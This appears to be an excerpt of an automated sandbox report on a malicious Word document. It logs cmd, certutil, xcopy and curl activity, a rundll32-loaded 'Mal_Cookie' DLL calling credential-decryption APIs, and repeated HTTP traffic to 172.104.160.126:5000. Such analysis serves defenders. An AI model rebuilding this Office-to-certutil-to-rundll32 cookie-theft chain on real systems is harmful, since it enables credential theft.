Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C15E30 BCryptGenRandom,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92BF2210 new,CryptStringToBinaryA,delete,delete,delete,CryptStringToBinaryA,CryptUnprotectData,new,delete,delete,delete,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92BF2E60 new,new,new,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptCloseAlgorithmProvider,BCryptGenerateSymmetricKey,BCryptDecrypt,BCryptDecrypt,BCryptCloseAlgorithmProvider,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,delete,delete,delete,delete,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C39500 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C15B90 BCryptGenRandom,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C65EE0 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C65E90 CryptAcquireContextA,CryptCreateHash,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C65F70 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C5E0B0 CertOpenStore,GetLastError,CertCreateCertificateChainEngine,GetLastError,CertGetCertificateChain,GetLastError,CertFreeCertificateChainEngine,CertCloseStore,CertFreeCertificateChain,CertFreeCertificateContext,CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,_heap_alloc,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C64530 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C645B0 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C645A0 CryptHashData,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C64B30 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C5E990 CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C66EC0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 33_2_0087F820 CryptAcquireContextA,CryptCreateHash,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 33_2_0087F02B CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 33_2_0087F860 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 33_2_00876400 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 33_2_0087EC10 malloc,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 33_2_00876591 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 33_2_00873EA4 _strdup,fopen,free,fseek,ftell,fread,fclose,free,free,fseek,malloc,malloc,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,free,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 33_2_0087C6E0 malloc,CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 33_2_0087C730 CryptHashData,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 33_2_0087C750 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Windows\System32\rundll32.exe | Code function: mov dword ptr [rbp+04h], 424D53FFh
Source: unknown | HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49772 version: TLS 1.0
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: unknown | HTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49786 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49818 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49213 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49233 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49268 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49325 version: TLS 1.2
Source: Binary string: curl.pdb source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 0000000D.00000000.2155057954.00000000008B5000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: D:\c++\Mal_Cookie_x64\x64\Release\mscorsvc.pdb source: certutil.exe, 0000000E.00000003.2191196676.0000000004907000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C0B230 _Bitmask_includes,operator&=,_Bitmask_includes,_Bitmask_includes,operator&=,_Bitmask_includes,GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,operator&=,std::_Fs_file::_Fs_file,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C0B1C0 __std_fs_close_handle,FindFirstFileExW,GetLastError,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92BF18C0 FindFirstFileW,new,delete,delete,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,delete,delete,delete,FindNextFileW,FindClose,delete,delete,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92CCDD10 type_info::_name_internal_method,FindFirstFileExW,Concurrency::details::_Scheduler::_Scheduler,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,FindNextFileW,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Colors\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\

Software Vulnerabilities

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\cmd.exe
Source: winword.exe | Memory has grown: Private usage: 1MB later: 100MB

Networking

Source: C:\Windows\System32\rundll32.exe | Network Connect: 172.104.160.126 5000
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 8099
Source: unknown | Network traffic detected: HTTP traffic on port 8099 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 8099 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49724
Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49725
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49726
Source: unknown | Network traffic detected: HTTP traffic on port 49785 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknown | Network traffic detected: HTTP traffic on port 49787 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49787
Source: unknown | Network traffic detected: HTTP traffic on port 49788 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49788
Source: unknown | Network traffic detected: HTTP traffic on port 49791 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49791
Source: unknown | Network traffic detected: HTTP traffic on port 49792 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49792
Source: unknown | Network traffic detected: HTTP traffic on port 49796 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49796
Source: unknown | Network traffic detected: HTTP traffic on port 49799 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49799
Source: unknown | Network traffic detected: HTTP traffic on port 49802 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49802
Source: unknown | Network traffic detected: HTTP traffic on port 49803 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49803
Source: unknown | Network traffic detected: HTTP traffic on port 49804 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49804
Source: unknown | Network traffic detected: HTTP traffic on port 49805 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49805
Source: unknown | Network traffic detected: HTTP traffic on port 49806 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49806
Source: unknown | Network traffic detected: HTTP traffic on port 49807 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49807
Source: unknown | Network traffic detected: HTTP traffic on port 49808 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49808
Source: unknown | Network traffic detected: HTTP traffic on port 49809 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49809
Source: unknown | Network traffic detected: HTTP traffic on port 49810 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49810
Source: unknown | Network traffic detected: HTTP traffic on port 49811 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49811
Source: unknown | Network traffic detected: HTTP traffic on port 49812 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49812
Source: unknown | Network traffic detected: HTTP traffic on port 49813 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49813
Source: unknown | Network traffic detected: HTTP traffic on port 49814 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 49195 -> 8099
Source: unknown | Network traffic detected: HTTP traffic on port 8099 -> 49195
Source: unknown | Network traffic detected: HTTP traffic on port 49209 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49209
Source: unknown | Network traffic detected: HTTP traffic on port 49210 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49210
Source: unknownNetwork traffic detected: HTTP traffic on port 49211 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49211
Source: unknownNetwork traffic detected: HTTP traffic on port 49212 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49212
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49212
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49212
Source: unknownNetwork traffic detected: HTTP traffic on port 49214 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49214
Source: unknownNetwork traffic detected: HTTP traffic on port 49215 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49215
Source: unknownNetwork traffic detected: HTTP traffic on port 49216 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49216
Source: unknownNetwork traffic detected: HTTP traffic on port 49218 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49218
Source: unknownNetwork traffic detected: HTTP traffic on port 49219 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49219
Source: unknownNetwork traffic detected: HTTP traffic on port 49220 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49220
Source: unknownNetwork traffic detected: HTTP traffic on port 49221 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49221
Source: unknownNetwork traffic detected: HTTP traffic on port 49222 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49222
Source: unknownNetwork traffic detected: HTTP traffic on port 49223 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49223
Source: unknownNetwork traffic detected: HTTP traffic on port 49224 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49224
Source: unknownNetwork traffic detected: HTTP traffic on port 49225 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49225
Source: unknownNetwork traffic detected: HTTP traffic on port 49226 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49226
Source: unknownNetwork traffic detected: HTTP traffic on port 49227 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49227
Source: unknownNetwork traffic detected: HTTP traffic on port 49228 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49228
Source: unknownNetwork traffic detected: HTTP traffic on port 49229 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49229
Source: unknownNetwork traffic detected: HTTP traffic on port 49230 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49230
Source: unknownNetwork traffic detected: HTTP traffic on port 49231 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49231
Source: unknownNetwork traffic detected: HTTP traffic on port 49232 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49232
Source: unknownNetwork traffic detected: HTTP traffic on port 49234 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49234
Source: unknownNetwork traffic detected: HTTP traffic on port 49235 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49235
Source: unknownNetwork traffic detected: HTTP traffic on port 49236 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49236
Source: unknownNetwork traffic detected: HTTP traffic on port 49237 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49237
Source: unknownNetwork traffic detected: HTTP traffic on port 49238 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49238
Source: unknownNetwork traffic detected: HTTP traffic on port 49239 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49239
Source: unknownNetwork traffic detected: HTTP traffic on port 49240 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49240
Source: unknownNetwork traffic detected: HTTP traffic on port 49241 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49241
Source: unknownNetwork traffic detected: HTTP traffic on port 49242 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49242
Source: unknownNetwork traffic detected: HTTP traffic on port 49243 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49243
Source: unknownNetwork traffic detected: HTTP traffic on port 49244 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49244
Source: unknownNetwork traffic detected: HTTP traffic on port 49245 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49245
Source: unknownNetwork traffic detected: HTTP traffic on port 49246 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49246
Source: unknownNetwork traffic detected: HTTP traffic on port 49247 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49247
Source: unknownNetwork traffic detected: HTTP traffic on port 49248 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49248
Source: unknownNetwork traffic detected: HTTP traffic on port 49249 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49249
Source: unknownNetwork traffic detected: HTTP traffic on port 49250 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49250
Source: unknownNetwork traffic detected: HTTP traffic on port 49251 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49251
Source: unknownNetwork traffic detected: HTTP traffic on port 49252 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49252
Source: unknownNetwork traffic detected: HTTP traffic on port 49253 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49253
Source: unknownNetwork traffic detected: HTTP traffic on port 49254 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49254
Source: unknownNetwork traffic detected: HTTP traffic on port 49255 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49255
Source: unknownNetwork traffic detected: HTTP traffic on port 49256 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49256
Source: unknownNetwork traffic detected: HTTP traffic on port 49257 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49257
Source: unknownNetwork traffic detected: HTTP traffic on port 49258 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49258
Source: unknownNetwork traffic detected: HTTP traffic on port 49259 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49259
Source: unknownNetwork traffic detected: HTTP traffic on port 49260 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49260
Source: unknownNetwork traffic detected: HTTP traffic on port 49261 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49261
Source: unknownNetwork traffic detected: HTTP traffic on port 49262 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49262
Source: unknownNetwork traffic detected: HTTP traffic on port 49263 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49263
Source: unknownNetwork traffic detected: HTTP traffic on port 49264 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49264
Source: unknownNetwork traffic detected: HTTP traffic on port 49265 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49265
Source: unknownNetwork traffic detected: HTTP traffic on port 49266 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49266
Source: unknownNetwork traffic detected: HTTP traffic on port 49267 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49267
Source: unknownNetwork traffic detected: HTTP traffic on port 49269 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49269
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49269
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49269
Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49270
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49270
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49270
Source: unknownNetwork traffic detected: HTTP traffic on port 49271 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49271
Source: unknownNetwork traffic detected: HTTP traffic on port 49272 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49272
Source: unknownNetwork traffic detected: HTTP traffic on port 49273 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49273
Source: unknownNetwork traffic detected: HTTP traffic on port 49274 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49274
Source: unknownNetwork traffic detected: HTTP traffic on port 49275 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49275
Source: unknownNetwork traffic detected: HTTP traffic on port 49276 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49276
Source: unknownNetwork traffic detected: HTTP traffic on port 49277 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49277
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49277
Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49278
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49278
Source: unknownNetwork traffic detected: HTTP traffic on port 49279 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49279
Source: unknownNetwork traffic detected: HTTP traffic on port 49280 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49280
Source: unknownNetwork traffic detected: HTTP traffic on port 49281 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49281
Source: unknownNetwork traffic detected: HTTP traffic on port 49282 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49282
Source: unknownNetwork traffic detected: HTTP traffic on port 49283 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49283
Source: unknownNetwork traffic detected: HTTP traffic on port 49284 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49284
Source: unknownNetwork traffic detected: HTTP traffic on port 49285 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49285
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49285
Source: unknownNetwork traffic detected: HTTP traffic on port 49286 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49286
Source: unknownNetwork traffic detected: HTTP traffic on port 49287 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49287
Source: unknownNetwork traffic detected: HTTP traffic on port 49288 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49288
Source: unknownNetwork traffic detected: HTTP traffic on port 49289 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49289
Source: unknownNetwork traffic detected: HTTP traffic on port 49290 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49290
Source: unknownNetwork traffic detected: HTTP traffic on port 49291 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49291
Source: unknownNetwork traffic detected: HTTP traffic on port 49292 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49292
Source: unknownNetwork traffic detected: HTTP traffic on port 49293 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49293
Source: unknownNetwork traffic detected: HTTP traffic on port 49294 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49294
Source: unknownNetwork traffic detected: HTTP traffic on port 49295 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49295
Source: unknownNetwork traffic detected: HTTP traffic on port 49296 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49296
Source: unknownNetwork traffic detected: HTTP traffic on port 49297 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49297
Source: unknownNetwork traffic detected: HTTP traffic on port 49298 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49298
Source: unknownNetwork traffic detected: HTTP traffic on port 49299 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49299
Source: unknownNetwork traffic detected: HTTP traffic on port 49300 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49300
Source: unknownNetwork traffic detected: HTTP traffic on port 49301 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49301
Source: unknownNetwork traffic detected: HTTP traffic on port 49302 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49302
Source: unknownNetwork traffic detected: HTTP traffic on port 49303 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49303
Source: unknownNetwork traffic detected: HTTP traffic on port 49304 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49304
Source: unknownNetwork traffic detected: HTTP traffic on port 49305 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49305
Source: unknownNetwork traffic detected: HTTP traffic on port 49306 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49306
Source: unknownNetwork traffic detected: HTTP traffic on port 49307 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49307
Source: unknownNetwork traffic detected: HTTP traffic on port 49308 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49308
Source: unknownNetwork traffic detected: HTTP traffic on port 49309 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49309
Source: unknownNetwork traffic detected: HTTP traffic on port 49310 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49310
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49310
Source: unknownNetwork traffic detected: HTTP traffic on port 49311 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49311
Source: unknownNetwork traffic detected: HTTP traffic on port 49312 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49312
Source: unknownNetwork traffic detected: HTTP traffic on port 49313 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49313
